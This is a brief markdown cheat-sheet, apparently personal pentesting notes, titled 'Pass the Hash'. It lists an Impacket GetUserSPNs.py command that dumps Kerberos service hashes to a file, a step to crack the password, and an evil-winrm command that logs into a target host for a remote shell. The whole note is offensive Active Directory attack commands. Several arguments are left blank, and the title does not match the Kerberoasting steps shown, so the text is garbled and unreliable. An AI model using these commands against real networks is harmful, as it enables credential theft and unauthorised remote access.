# Pass the Hash ## Usage ```sh GetUserSPNs.py / -hashes -outputfile hash.txt ``` * Crack the password * login ```sh evilwinrm -i $TARGET_IP -u -p password ```